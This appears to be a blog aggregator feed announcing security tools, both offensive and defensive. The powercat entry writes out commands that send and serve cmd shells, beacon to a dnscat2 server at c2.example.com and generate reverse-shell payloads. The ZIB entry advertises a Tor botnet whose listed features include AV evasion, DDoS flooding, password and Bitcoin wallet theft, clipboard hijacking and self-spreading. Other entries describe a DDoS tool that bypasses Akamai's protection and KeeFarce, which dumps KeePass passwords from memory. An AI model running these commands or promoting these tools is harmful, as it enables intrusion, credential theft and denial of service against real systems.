By default, powercat reads input from the console and writes output to the console using Write-Host. You can change the output type to 'Bytes' or 'String' with -o.
Basic Client:
powercat -c 10.1.1.1 -p 443
Basic Listener:
powercat -l -p 8000
Basic Client, Output as Bytes:
powercat -c 10.1.1.1 -p 443 -o Bytes

File Transfer
powercat can be used to transfer files back and forth using -i (Input) and -of (Output File).
Send File:
powercat -c 10.1.1.1 -p 443 -i C:\inputfile
Receive File:
powercat -l -p 8000 -of C:\inputfile
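The same send/receive-file pattern can be sketched with plain sockets (a minimal Python sketch, not powercat's implementation; the host/port values are arbitrary): the sender streams the file's bytes and the listener writes whatever arrives to the output path.

```python
import socket

def receive_file(port, out_path):
    """Listener side, analogous to: powercat -l -p <port> -of <out_path>."""
    srv = socket.socket()
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("0.0.0.0", port))
    srv.listen(1)
    conn, _ = srv.accept()
    with conn, open(out_path, "wb") as fh:
        while True:
            chunk = conn.recv(4096)
            if not chunk:   # sender closed the connection: transfer complete
                break
            fh.write(chunk)

def send_file(host, port, in_path):
    """Client side, analogous to: powercat -c <host> -p <port> -i <in_path>."""
    with socket.create_connection((host, port)) as conn, open(in_path, "rb") as fh:
        conn.sendall(fh.read())
```

There is no framing or integrity check here, which is also true of a bare netcat-style transfer: the connection close is the only end-of-file signal.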

Shells
powercat can be used to send and serve shells. Specify an executable to -e, or use -ep to execute powershell.
Serve a cmd Shell:
powercat -l -p 443 -e cmd
Send a cmd Shell:
powercat -c 10.1.1.1 -p 443 -e cmd
Serve a shell which executes powershell commands:
powercat -l -p 443 -ep

DNS and UDP
powercat supports more than sending data over TCP. Specify -u to enable UDP Mode. Data can also be sent to a dnscat2 server with -dns.
Send Data Over UDP:
powercat -c 10.1.1.1 -p 8000 -u
powercat -l -p 8000 -u
Connect to the c2.example.com dnscat2 server using the DNS server on 10.1.1.1:
powercat -c 10.1.1.1 -p 53 -dns c2.example.com
Send a shell to the c2.example.com dnscat2 server using the default DNS server in Windows:
powercat -dns c2.example.com -e cmd

Relays
Relays in powercat work just like traditional netcat relays, but you don't have to create a file or start a second process. You can also relay data between connections of different protocols.
TCP Listener to TCP Client Relay:
powercat -l -p 8000 -r tcp:10.1.1.16:443
TCP Listener to UDP Client Relay:
powercat -l -p 8000 -r udp:10.1.1.16:53
TCP Listener to DNS Client Relay:
powercat -l -p 8000 -r dns:10.1.1.1:53:c2.example.com
TCP Listener to DNS Client Relay using the Windows Default DNS Server:
powercat -l -p 8000 -r dns:::c2.example.com
TCP Client to Client Relay:
powercat -c 10.1.1.1 -p 9000 -r tcp:10.1.1.16:443
TCP Listener to Listener Relay:
powercat -l -p 8000 -r tcp:9000
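Under the hood, a listener-to-client relay is just two byte pumps glued together. A minimal TCP-to-TCP sketch in Python (not powercat's code; the ports are arbitrary) looks like:

```python
import socket
import threading

def pump(src, dst):
    # Copy bytes in one direction until the source side closes.
    while True:
        data = src.recv(4096)
        if not data:
            break
        dst.sendall(data)

def relay(listen_port, target_host, target_port):
    """Roughly: powercat -l -p <listen_port> -r tcp:<target_host>:<target_port>"""
    srv = socket.socket()
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", listen_port))
    srv.listen(1)
    inbound, _ = srv.accept()
    outbound = socket.create_connection((target_host, target_port))
    # One pump per direction, so traffic flows both ways concurrently.
    for a, b in ((inbound, outbound), (outbound, inbound)):
        threading.Thread(target=pump, args=(a, b), daemon=True).start()
```

Relaying between different protocols (UDP, DNS) follows the same two-pump pattern with a different transport on one side, which is why no temp file or second process is needed.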

Generate Payloads
Payloads which do a specific action can be generated using -g (Generate Payload) and -ge (Generate Encoded Payload). Encoded payloads can be executed with powershell -E. You can use these if you don't want to use all of powercat.
Generate a reverse tcp payload which connects back to 10.1.1.15 port 443:
powercat -c 10.1.1.15 -p 443 -e cmd -g
Generate a bind tcp encoded command which listens on port 8000:
powercat -l -p 8000 -e cmd -ge

Misc Usage
powercat can also be used to perform portscans, and start persistent servers.
Basic TCP Port Scanner:
(21,22,80,443) | % {powercat -c 10.1.1.10 -p $_ -t 1 -Verbose -d}
Start A Persistent Server That Serves a File:
powercat -l -p 443 -i C:\inputfile -rep


XPL-SEARCH - Search Exploits In Multiple Exploit Databases


XPL SEARCH
Search exploits in multiple exploit databases!
Exploit databases available:
* Exploit-DB
* Milw0rm
* PacketStormSecurity
* IntelligentExploit
* IEDB
* CVE

TO RUN THE SCRIPT
PHP Version (cli) 5.5.8 or higher
php5-cli Lib
cURL support Enabled
php5-curl Lib
cURL Version 7.40.0 or higher
allow_url_fopen On
Read & write permissions

ABOUT DEVELOPER
Author_Nick       CoderPIRATA
Author_Name Eduardo
Email coderpirata@gmail.com
Blog http://coderpirata.blogspot.com.br/
Twitter https://twitter.com/coderpirata
Google+ https://plus.google.com/103146866540699363823
Pastebin http://pastebin.com/u/CoderPirata
Github https://github.com/coderpirata/

"CHANGELOG"
0.1 - [02/07/2015]
- Started.

0.2 - [12/07/2015]
- Added Exploit-DB.
- Added Colors, only for linux!
- Added Update Function.
- "Generator" of User-Agent reworked.
- Small errors and adaptations.

0.3 - [22/07/2015]
- Bugs solved.
- Added "save" Function.
- Added "set-db" function.

0.4 - [05/08/2015]
- Save function modified.
- Added Scan with list.

0.5 - [29/08/2015]
- Added search by Author.

0.6 - [09/09/2015]
- Now displays the author of the exploit.
* Does not work with IntelligentExploit.
- Changes in search logs.

0.7 - [11/09/2015]
- Added search in CVE.
* ID.
* Simple search - id 6.
- Bug in exploit-db search, "papers" fixed.
- Added standard time of 60 seconds for each request.
- file_get_contents() was removed from "browser()".
- Code of milw00rm search has been modified.
- Changes in search logs.
- Added date.

0.7.1 - [17/09/2015]
- Bug in milw00rm solved

0.8 - [05/10/2015]
- Added shebang.
- Commands "save", "save-log" and "save-dir" have been modified.
- Added "no-db" option.
- GETOPT() modified - Thanks Jack2.
- Bug on save-dir solved.
- Others minor bugs solved.

Screenshot




LMD - Linux Malware Detect

Linux Malware Detect (LMD) is a malware scanner for Linux released under the GNU GPLv2 license that is designed around the threats faced in shared hosted environments. It uses threat data from network edge intrusion detection systems to extract malware that is actively being used in attacks and generates signatures for detection. In addition, threat data is also derived from user submissions with the LMD checkout feature and from malware community resources. The signatures that LMD uses are MD5 file hashes and HEX pattern matches; they are also easily exported to any number of detection tools such as ClamAV.
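The two signature types reduce to something very simple in code. A toy illustration (the signatures below are made up for the example; they are not real LMD signatures):

```python
import hashlib
import binascii

# MD5 signatures identify a whole known file; HEX signatures match a byte
# pattern anywhere in the content, catching variants of the same threat.
MD5_SIGS = {"5d41402abc4b2a76b9719d911017c592": "demo.known_malware"}  # md5(b"hello")
HEX_SIGS = {"6576616c286261736536345f6465636f6465": "php.base64.eval"}  # "eval(base64_decode"

def scan_bytes(data):
    """Return the names of all signatures matching this content."""
    hits = []
    digest = hashlib.md5(data).hexdigest()
    if digest in MD5_SIGS:
        hits.append(MD5_SIGS[digest])
    blob = binascii.hexlify(data).decode()
    for pattern, name in HEX_SIGS.items():
        if pattern in blob:
            hits.append(name)
    return hits

print(scan_bytes(b"hello"))                                   # MD5 hit
print(scan_bytes(b"<?php eval(base64_decode($_POST[1])); ?>"))  # HEX hit
```

The hash-or-pattern structure is also what makes the signature set easy to export to other engines such as ClamAV.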

The driving force behind LMD is that there is currently limited availability of open source/restriction-free tools for Linux systems that focus on malware detection and, more importantly, that get it right. Many of the AV products that perform malware detection on Linux have a very poor track record of detecting threats, especially those targeted at shared hosted environments.

The threat landscape in shared hosted environments is unique from that of the standard AV products detection suite in that they are detecting primarily OS level trojans, rootkits and traditional file-infecting viruses but missing the ever increasing variety of malware on the user account level which serves as an attack platform.

The commercial products available for malware detection and remediation in multi-user shared environments remain abysmal. An analysis of 8,883 malware hashes, detected by LMD 1.5, against 30 commercial anti-virus and malware products paints a picture of how poorly commercial solutions perform.
DETECTED KNOWN MALWARE: 1951
% AV DETECT (AVG): 58
% AV DETECT (LOW): 10
% AV DETECT (HIGH): 100
UNKNOWN MALWARE: 6931
Using the Team Cymru malware hash registry, we can see that of the 8,883 malware hashes shipping with LMD 1.5, there were 6,931, or 78%, that went undetected by 30 commercial anti-virus and malware products. The 1,951 threats that were detected had an average detection rate of 58%, with low and high detection rates of 10% and 100% respectively. There could not be a clearer statement of the need for an open and community-driven malware remediation project that focuses on the threat landscape of multi-user shared environments.

Features:
  • MD5 file hash detection for quick threat identification
  • HEX based pattern matching for identifying threat variants
  • statistical analysis component for detection of obfuscated threats (e.g: base64)
  • integrated detection of ClamAV to use as scanner engine for improved performance
  • integrated signature update feature with -u|--update
  • integrated version update feature with -d|--update-ver
  • scan-recent option to scan only files that have been added/changed in X days
  • scan-all option for full path based scanning
  • checkout option to upload suspected malware to rfxn.com for review / hashing
  • full reporting system to view current and previous scan results
  • quarantine queue that stores threats in a safe fashion with no permissions
  • quarantine batching option to quarantine the results of a current or past scans
  • quarantine restore option to restore files to original path, owner and perms
  • quarantine suspend account option to Cpanel suspend or shell revoke users
  • cleaner rules to attempt removal of malware injected strings
  • cleaner batching option to attempt cleaning of previous scan reports
  • cleaner rules to remove base64 and gzinflate(base64 injected malware
  • daily cron based scanning of all changes in last 24h in user homedirs
  • daily cron script compatible with stock RH style systems, Cpanel & Ensim
  • kernel based inotify real time file scanning of created/modified/moved files
  • kernel inotify monitor that can take path data from STDIN or FILE
  • kernel inotify monitor convenience feature to monitor system users
  • kernel inotify monitor can be restricted to a configurable user html root
  • kernel inotify monitor with dynamic sysctl limits for optimal performance
  • kernel inotify alerting through daily and/or optional weekly reports
  • e-mail alert reporting after every scan execution (manual & daily)
  • path, extension and signature based ignore options
  • background scanner option for unattended scan operations
  • verbose logging & output of all actions


Source Data:
The defining difference with LMD is that it doesn’t just detect malware based on signatures/hashes that someone else generated but rather it is an encompassing project that actively tracks in the wild threats and generates signatures based on those real world threats that are currently circulating.

There are four main sources for malware data that is used to generate LMD signatures:
Network Edge IPS: Through networks managed as part of my day-to-day job, primarily web hosting related, our web servers receive a large amount of daily abuse events, all of which are logged by our network edge IPS. The IPS events are processed to extract malware URLs, decode POST payloads and base64/gzip encoded abuse data, and ultimately that malware is retrieved, reviewed, classified and then signatures generated as appropriate. The vast majority of LMD signatures have been derived from IPS extracted data.
Community Data: Data is aggregated from multiple community malware websites such as clean-mx and malwaredomainlist then processed to retrieve new malware, review, classify and then generate signatures.
ClamAV: The HEX & MD5 detection signatures from ClamAV are monitored for relevant updates that apply to the target user group of LMD and added to the project as appropriate. To date there have been roughly 400 signatures ported from ClamAV, while the LMD project has contributed back to ClamAV by submitting over 1,100 signatures and continues to do so on an ongoing basis.
User Submission: LMD has a checkout feature that allows users to submit suspected malware for review, this has grown into a very popular feature and generates on average about 30-50 submissions per week.

Signature Updates:
The LMD signatures are updated typically once per day or more frequently, depending on incoming threat data from the LMD checkout feature, IPS malware extraction and other sources. The updating of signatures in LMD installations is performed daily through the default cron.daily script with the --update option, which can be run manually at any time.

An RSS feed is available for tracking malware threat updates: http://www.rfxn.com/api/lmd

Detected Threats:
LMD 1.5 has a total of 10,822 (8,908 MD5 / 1,914 HEX) signatures, before any updates. The top 60 threats by prevalence detected by LMD are as follows:
base64.inject.unclassed     perl.ircbot.xscan
bin.dccserv.irsexxy perl.mailer.yellsoft
bin.fakeproc.Xnuxer perl.shell.cbLorD
bin.ircbot.nbot perl.shell.cgitelnet
bin.ircbot.php3 php.cmdshell.c100
bin.ircbot.unclassed php.cmdshell.c99
bin.pktflood.ABC123 php.cmdshell.cih
bin.pktflood.osf php.cmdshell.egyspider
bin.trojan.linuxsmalli php.cmdshell.fx29
c.ircbot.tsunami php.cmdshell.ItsmYarD
exp.linux.rstb php.cmdshell.Ketemu
exp.linux.unclassed php.cmdshell.N3tshell
exp.setuid0.unclassed php.cmdshell.r57
gzbase64.inject php.cmdshell.unclassed
html.phishing.auc61 php.defash.buno
html.phishing.hsbc php.exe.globals
perl.connback.DataCha0s php.include.remote
perl.connback.N2 php.ircbot.InsideTeam
perl.cpanel.cpwrap php.ircbot.lolwut
perl.ircbot.atrixteam php.ircbot.sniper
perl.ircbot.bRuNo php.ircbot.vj_denie
perl.ircbot.Clx php.mailer.10hack
perl.ircbot.devil php.mailer.bombam
perl.ircbot.fx29 php.mailer.PostMan
perl.ircbot.magnum php.phishing.AliKay
perl.ircbot.oldwolf php.phishing.mrbrain
perl.ircbot.putr4XtReme php.phishing.ReZulT
perl.ircbot.rafflesia php.pktflood.oey
perl.ircbot.UberCracker php.shell.rc99
perl.ircbot.xdh php.shell.shellcomm


Real-Time Monitoring:
The inotify monitoring feature is designed to monitor paths/users in real time for file create/modify/move operations. This option requires a kernel that supports inotify_watch (CONFIG_INOTIFY), which is found in kernels 2.6.13+ and in CentOS/RHEL 5 by default. If you are running CentOS 4 you should consider an in-place upgrade.

There are three modes that the monitor can be executed with and they relate to what will be monitored, they are USERS|PATHS|FILES.
       e.g: maldet --monitor users
e.g: maldet --monitor /root/monitor_paths
e.g: maldet --monitor /home/mike,/home/ashton

The options break down as follows:
USERS: The users option will take the homedirs of all system users that are above inotify_minuid and monitor them. If inotify_webdir is set, then only the user's webdir, if it exists, will be monitored.
PATHS: A comma spaced list of paths to monitor
FILE: A line spaced file list of paths to monitor

Once you start maldet in monitor mode, it will preprocess the paths based on the option specified followed by starting the inotify process. The starting of the inotify process can be a time consuming task as it needs to setup a monitor hook for every file under the monitored paths. Although the startup process can impact the load temporarily, once the process has started it maintains all of its resources inside kernel memory and has a very small userspace footprint in memory or cpu usage.
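The three monitor modes can be told apart with straightforward preprocessing. A hedged sketch of that dispatch (illustrative only, not maldet's actual code): a literal "users" keyword, an existing file treated as a line-separated path list, and anything else treated as a comma-separated path list.

```python
import os

def resolve_monitor_arg(arg):
    """Return (mode, paths) mirroring the USERS|PATHS|FILE behavior above."""
    if arg == "users":
        # Caller would expand this to homedirs above inotify_minuid.
        return ("users", None)
    if os.path.isfile(arg):
        # A line-spaced file list of paths to monitor.
        with open(arg) as fh:
            return ("file", [line.strip() for line in fh if line.strip()])
    # A comma-spaced list of paths to monitor.
    return ("paths", arg.split(","))

print(resolve_monitor_arg("users"))
print(resolve_monitor_arg("/home/mike,/home/ashton"))
```

Whichever mode is chosen, the result is a flat list of paths that the inotify process then hooks recursively, which is why startup cost scales with the number of files under those paths.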


ZIB - The Open Tor Botnet


General information and instructions.

The Open Tor Botnet requires the installation and configuration of bitcoind; however, that is not detailed here for lack of time.
This bot-net is fully undetectable and bypasses all antivirus through running on top of Python 2.7's PyInstaller, which is used for many non-Trojan computer programs. The only hypothetical possibility of detection comes from the script; however, the script contains randomized-looking data through using a randomized AES key and initialization vector, meaning this is a non-issue.

ZIB.py is the main project file.
intel.py is the chat bot for handling automatic transactions and client authentication.
compileZIB.py is used by intel.py, and is started in the background using chp.exe
ZIB_imports.txt contains all the Python module imports that ZIB uses. They're appended to the script during compilation.
btcpurchases.txt includes all the Bitcoin payments that are pending. Pending transactions older than 24 hours are deleted.
channels.txt includes all completed BTC payments.
Point your webserver to C:\Python27\dist\ for hosting the bot executables.
chp.exe is required in the local dir.
For the IRC server, run bircd, set up an oper with the username Zlo and password RUSSIA!@#$RUSSIA!@#$RUSSIA!@#$RUSSIA!@#$. For the max users per ip set to 0 because tor users all connect from 127.0.0.1 and look the same to the IRCd. Keep all scripts in C:\Python27\Scripts.
Put nircmd in the local directory for editing file dates.

Features

  • ZIB is an IRC-based, Bitcoin-funded bot network that runs under Tor for anonymity.
  • ZIB is coded totally from scratch.
  • ZIB uses the Department of Defense standard for encryption of Top Secret files as one of its methods of generating fully undetectable binaries every time!
  • ZIB creates a new binary for every client with varying file sizes, creation dates, and rot13->zlib->base64->AES-256(random key+IV) encrypted strings.
  • ZIB is fully undetectable (FUD) to Anti-Virus.
  • ZIB has an automated system for handling payments, providing bot-net binaries, and creating bot-net IRC channels.
  • All bot networks on a ZIB network require a password to join.
  • ZIB uses passworded user-based authentication, handled through our Zlo intelligence bot, so you don't have to worry about channel password, main password, or bot compromise. Normal users can't create their own channels. All IRC functionalities are handled by the Zlo IRC intelligence bot. You can do authenticated, single bot commands through Zlo, or set up a user session on your bots, which is slightly less secure.
  • Paid users get unlimited bot space per channel.
  • Our bot has been tested on and is fully compatible with Windows Server 2008 R2 32-bit, Windows XP SP1 & SP3 32-bit, Windows 7, and Windows 8 64-bit.


Features

  • Multi-threaded HTTP/s (layer7 [Methods: TorsHammer, PostIt, Hulk, ApacheKiller, Slowloris, GoldenEye]), TCP/SSL, and fine-tuned UDP flooding. Ability to flood hidden services, or attack via the clearnet. 66 randomized DDoS user-agents and referers. All methods send randomized data, bypass firewalls, filtering, and caching. ZIB also comes with FTP flood, and TeamSpeak flood.
  • Undetectable ad-fraud smart viewer that's fully compatible with Firefox, Tor Browser Bundle, Portable Firefox, Internet Explorer, Google Chrome, Opera, Yandex, Torch, FlashPeak SlimBrowser, Epic Privacy Browser, Baidu, Maxthon, Comodo IceDragon, and QupZilla.
  • Download & Execute w/ optional SHA256 verification.
  • Update w/ optional SHA256 verification.
  • Chrome password recovery.
  • Each bot can act as a shell booter and utilize external php shells for attacks.
  • Replace Bitcoin addresses in clipboard with yours.
  • FileZilla password recovery.
  • Fully routed through Tor.
  • File, registry, startup folder, and main/daemon/tor process persistence.
  • Installation and use is completely hidden from bots.
  • 0/60 Fully undetectable to Antivirus.
  • File download/upload.
  • Process status, creator, and killer.
  • Undetectable, instant obfuscation when generating new binaries.
  • Self spreading.
  • All bot files are SHA256 hash verified. Broken/corrupted files get replaced.
  • Bypasses AntiVirus Deep-Scan.
  • Bot location varies, depending on administrative access.
  • IRC nickname format: Country[version]windows version|CPU bits|User Privileges|CPU cores|random characters. Ex: US[v2]XP|x32|A|4c|F4L0s4kpN5. 64-bit detection may be having issues (shows up as 32-bit).
  • Disables various windows functions WITHOUT giving the user warnings!
  • Disables Microsoft Windows error reporting, sending additional data, and error logging - System-wide as administrator, and on a per-user basis.
  • Disables User Access Control (UAC) - System-wide as administrator, and on a per-user basis.
  • Disables Windows Volume Shadow Copy Backup Service (vss) - System-wide as administrator.
  • Disables System Restore Service (srservice) - System-Wide as administrator.
  • Disables System Restore - System-Wide as administrator.
  • Melts on execution. Original file gets deleted. Should delete the file out of the temporary folder, if used with a binder.
  • Multi-threaded mass SSH scanner that saves servers on the bot's HDD encoded with base64, without duplicates or honeypots. Four integrated password lists of increasing difficulty [A,B,C,D], or brute force with min/max characters (supports numbers, upper/lowercase letters, symbols). Cracked routers are used for UDP/TCP/HTTP/ICMP flooding. UDP flood requires having the routers download a python script, and the majority of routers won't have Python. Has the ability to be used to take down DDoS-protected servers from scanning with just one bot. The Open Tor Botnet will optionally scan under Tor, multiple ports at once, IP range/s [A/B/C] or randomized IPs, optionally block government IPs, and blocks reserved IPv4 addresses aside from the user's LAN. BotKiller with file scanning [kills .exe, .bat, .scr, .pif, .dll, .lnk, .com] in AppData, Startup, etc. and has been successful against NanoCore, Andromeda, AGhost Silent Miner, Plasma HTTP/IRC/RAT, and almost every HackForums bot. The botkiller utilizes process scanning with file deletion, and registry scanning.
  • Mutex. No duplicate IRC connections.
  • Amazing error handling, install rate, detection ratio, and persistence.
  • Completely native malware. No .NET framework, or Python installation required!
  • Installs to the startup folder & AppData with a registry RUN key.
  • Kills all popular anti-virus and prevents A/V installation. Will disable Anti-Virus which have rootkits, through deleting important A/V dlls.
  • BotKiller, scanner, and A/V killer are optional. You could easily run the Open Tor botnet as a back-up for your bots, or install other software on them as back-up. The network control system is highly scalable. Dual-process and dual-file persistence. Files and processes are re-created nearly instantly after being removed.
  • Recovers File-Zilla logins, which is great for getting SSH, and FTP logins.
  • Automatically removes some ad-ware.
  • Contains an Omegle spreader which spreads either a link through social engineering tactics, or a Skype account with every line of text being completely unique in order to avoid detection. Always waits for the Omegle stranger to type a message before responding with a reply. Shows stranger typing, and writes messages human-like. Multi-threaded.
  • Deletes zone identifier on all bot files, Tor, download & executed files, and update files. This means that you don't get the "Would you like to run this program?" dialog, and it runs completely hidden.
  • Detects all Windows operating systems from Windows 95, ME, to 8. Will show Windows 10 as just Windows, or W8. Text-To-Speech with speaker detection.
  • Duplicate nick-name handling, and ping-out handling.
  • Tor is downloaded directly from the Tor Project - It only needs to be downloaded once, but still has persistence.
  • Grabs the bot IP address on startup, has the ability to disable/enable bot command response, view status of ssh scanner/omegle spreading/ddos/botkiller and start/stop them.
  • Functionality to kill the bot instance, uninstall ZIB, grab full OS info, check if a host on a certain port is online/offline using TCP connect and a full HTTP request whilst checking the reply for server status related information.
  • Check if a process is running, how many are running, and list directories. Use \ instead of C:\, e.g. !dir \, as some people run their main operating system on non-standard drive letters, especially on servers.
  • Upload specific files of your choosing that exist on a bot's computer to your FTP server. Files that can be uploaded could include BTC wallets.
  • Read files in plain-text off zombie computers. View amount of scanned SSH servers. Kill processes. The bot will tell you about missing command parameters, if a certain parameter contains the wrong data-type, etc. Errors from executing a command are outputted to the IRC channel without flooding the chat.
  • Commands are run multi-threaded and concurrently. This means your bots won't freeze up each time you run a command.



Infernal-Twin - This Is Evil Twin Attack Automated (Wireless Hacking)


This tool is created to aid the penetration testers in assessing wireless security. Author is not responsible for misuse. Please read instructions thoroughly.

Usage
sudo python InfernalWireless.py

How to install
$ sudo apt-get install apache2
$ sudo apt-get install mysql-server libapache2-mod-auth-mysql php5-mysql

$ sudo apt-get install python-scapy
$ sudo apt-get install python-wxtools
$ sudo apt-get install python-mysqldb

$ sudo apt-get install aircrack-ng

$ git clone https://github.com/entropy1337/infernal-twin.git
$ cd infernal-twin


$ python db_connect_creds.py
dbconnect.conf doesn't exists or creds are incorrect
*************** creating DB config file ************
Enter the DB username: root
Enter the password: *************
trying to connect
username root

FAQ:

I have a problem with connecting to the Database
Solution:
(Thanks to @lightos for this fix)
There seem to be a few issues with database connectivity. The solution is to create a new user on the database and use that user for launching the tool. Follow these steps:
  1. Delete dbconnect.conf file from the Infernalwireless folder
  2. Run the following command from your mysql console.
    mysql> use mysql;
    mysql> CREATE USER 'root2'@'localhost' IDENTIFIED BY 'enter the new password here';
    mysql> GRANT ALL PRIVILEGES ON *.* TO 'root2'@'localhost' WITH GRANT OPTION;
  3. Try to run the tool again.

Release Notes:

New Features:
  • GUI Wireless security assessment SUIT
  • Implemented
  • WPA2 hacking
  • WEP Hacking
  • WPA2 Enterprise hacking
  • Wireless Social Engineering
  • SSL Strip
  • Report generation
  • PDF Report
  • HTML Report
  • Note taking function
  • Data is saved into Database
  • Network mapping
  • MiTM
  • Probe Request

Changes:
  • Improved compatibility
  • Report improvement
  • Better NAT Rules

Bug Fixes:
  • Wireless Evil Access Point traffic redirect
  • Fixed WPA2 Cracking
  • Fixed Infernal Wireless
  • Fixed Free AP
  • Check for requirements
  • DB implementation via config file
  • Improved Catch and error
  • Check for requirements
  • Works with Kali 2

Coming Soon:
  • Parsing t-shark log files for gathering creds and more
  • More attacks.

Expected bugs:
  • Wireless card might not be supported
  • Window might crash
  • Freeze
  • A lot of work to be done, but this tool is still being developed.


ARDT - Akamai Reflective DDoS Tool


Akamai Reflective DDoS Tool

Attack the origin host behind the Akamai Edge hosts and bypass the DDoS protection offered by Akamai services.

How it works...

Akamai boasts around 100,000 edge nodes around the world, which offer load balancing, web application firewall, caching, etc., to ensure that a minimal amount of requests actually hit the origin web-server being protected. However, the issue with caching is that you cannot cache something that is non-deterministic, i.e. a search result. A search that has not been requested before is likely not in the cache, and will result in a cache miss, with the Akamai edge node requesting the resource from the origin server itself.

What this tool does is, provided a list of Akamai edge nodes and a valid cache-missing request, produce multiple requests that hit the origin server via the Akamai edge nodes. As you can imagine, if you had 50 IP addresses under your control, sending requests at around 20 per second, with a 100,000 Akamai edge node list, and a request which results in 10KB hitting the origin, if my calculations are correct, that's around 976MB/s hitting the origin server, which is a hell of a lot of traffic.
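A quick check of the arithmetic under the stated assumptions (50 IPs at 20 requests/second, 10KB per cache-missing request, a 100,000-node edge list): the ~976MB figure corresponds to pushing 10KB through every node on the list, while the attacker-side request rate bounds the sustained per-second traffic actually reaching the origin.

```python
edge_nodes = 100_000          # size of the Akamai edge node list
kb_per_request = 10           # KB hitting the origin per cache-missing request
ips = 50                      # attacker-controlled IP addresses
req_per_sec_per_ip = 20       # requests per second from each IP

# 100,000 nodes x 10KB each: total cache-missing payload across the list.
total_mb = edge_nodes * kb_per_request / 1024            # ~976.6 MB

# The attacker side only generates 1,000 requests/s, which caps the
# sustained rate of traffic reaching the origin.
req_per_sec = ips * req_per_sec_per_ip                   # 1,000 requests/s
origin_mb_per_sec = req_per_sec * kb_per_request / 1024  # ~9.8 MB/s

print(f"total across list: {total_mb:.1f} MB")
print(f"sustained origin rate: {origin_mb_per_sec:.1f} MB/s")
```

So the headline number is the aggregate payload across the full node list; the per-second origin load scales with how many requests the controlled IPs can emit.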

Finding Akamai Edge Nodes

To find Akamai Edge Nodes, the following script has been included:
# python ARDT_Akamai_EdgeNode_Finder.py
This can be edited quite easily to find more; it then saves the IPs automatically.


KeeFarce - Extracts Passwords From A Keepass 2.X Database, Directly From Memory



KeeFarce allows for the extraction of KeePass 2.x password database information from memory. The cleartext information, including usernames, passwords, notes and URLs, is dumped into a CSV file in %AppData%.

General Design
KeeFarce uses DLL injection to execute code within the context of a running KeePass process. C# code execution is achieved by first injecting an architecture-appropriate bootstrap DLL. This spawns an instance of the dot net runtime within the appropriate app domain, subsequently executing KeeFarceDLL.dll (the main C# payload).
The KeeFarceDLL uses CLRMD to find the necessary object in the KeePass process's heap, locates the pointers to some required sub-objects (using offsets), and uses reflection to call an export method.

Prebuilt Packages
An appropriate build of KeeFarce needs to be used depending on the KeePass target's architecture (32 bit or 64 bit). Archives and their shasums can be found under the 'prebuilt' directory.

Executing
In order to execute on the target host, the following files need to be in the same folder:
  • BootstrapDLL.dll
  • KeeFarce.exe
  • KeeFarceDLL.dll
  • Microsoft.Diagnostic.Runtime.dll
Copy these files across to the target and execute KeeFarce.exe

Building
Open up KeeFarce.sln with Visual Studio (note: dev was done on Visual Studio 2015) and hit 'build'. The results will be spat out into dist/$architecture. You'll have to copy the KeeFarceDLL.dll and Microsoft.Diagnostic.Runtime.dll files into the folder before executing, as these are architecture independent.

Compatibility
KeeFarce has been tested on:
  • KeePass 2.28, 2.29 and 2.30 - running on Windows 8.1 - both 32 and 64 bit.
This should also work on older Windows machines (Win 7 with a recent service pack). If you're targeting something other than the above, then testing in a lab environment beforehand is recommended.

Acknowledgements
  • Sharp Needle by Chad Zawistowski was used for the DLL injection technique.
  • Code by Alois Kraus was used to get the pointer to object C# voodoo working.


Security Onion - Linux Distro For Intrusion Detection, Network Security Monitoring, And Log Management


Security Onion is a Linux distro for intrusion detection, network security monitoring, and log management. It's based on Ubuntu and contains Snort, Suricata, Bro, OSSEC, Sguil, Squert, ELSA, Xplico, NetworkMiner, and many other security tools. The easy-to-use Setup wizard allows you to build an army of distributed sensors for your enterprise in minutes!


Easy-to-use Setup wizard allows you to build an army of distributed sensors for your enterprise in minutes


Analyze your NIDS/HIDS alerts with Squert


Pivot between multiple data types with Sguil and send pcaps to Wireshark and NetworkMiner


Use ELSA to slice and dice your logs


Access full packet capture with CapMe


Snort/Suricata and Bro compiled with PF_RING to handle lots of traffic


Easy updates

Data Types

  • Alert data - HIDS alerts from OSSEC and NIDS alerts from Snort/Suricata
  • Asset data from Prads and Bro
  • Full content data from netsniff-ng
  • Host data via OSSEC and syslog-ng
  • Session data from Argus, Prads, and Bro
  • Transaction data - http/ftp/dns/ssl/other logs from Bro

Tails 1.7 - The Amnesic Incognito Live System


Tails is a live operating system that you can start on almost any computer from a DVD, USB stick, or SD card. It aims at preserving your privacy and anonymity, and helps you to:
  • use the Internet anonymously and circumvent censorship;
    all connections to the Internet are forced to go through the Tor network;
  • leave no trace on the computer you are using unless you ask it explicitly;
  • use state-of-the-art cryptographic tools to encrypt your files, emails and instant messaging.  

Tails, The Amnesic Incognito Live System, version 1.7, is out.
This release fixes numerous security issues. All users must upgrade as soon as possible.

New features

  • You can now start Tails in offline mode to disable all networking for additional security. Doing so can be useful when working on sensitive documents.
  • We added Icedove, a rebranded version of the Mozilla Thunderbird email client.
    Icedove is currently a technology preview. It is safe to use in the context of Tails but it will be better integrated in future versions until we remove Claws Mail. Users of Claws Mail should refer to our instructions to migrate their data from Claws Mail to Icedove.

Upgrades and changes

  • Improve the wording of the first screen of Tails Installer.
  • Restart Tor automatically if connecting to the Tor network takes too long. (#9516)
  • Update several firmware packages which might improve hardware compatibility.
  • Update the Tails signing key which is now valid until 2017.
  • Update Tor Browser to 5.0.4.
  • Update Tor to 0.2.7.4.

Fixed problems

  • Prevent wget from leaking the IP address when using the FTP protocol. (#10364)
  • Prevent symlink attack on ~/.xsession-errors via tails-debugging-info which could be used by the amnesia user to bypass read permissions on any file. (#10333)
  • Force synchronization of data on the USB stick at the end of automatic upgrades. This might fix some reliability bugs in automatic upgrades.
  • Make the "I2P is ready" notification more reliable.

Viewing all 5816 articles
Browse latest View live

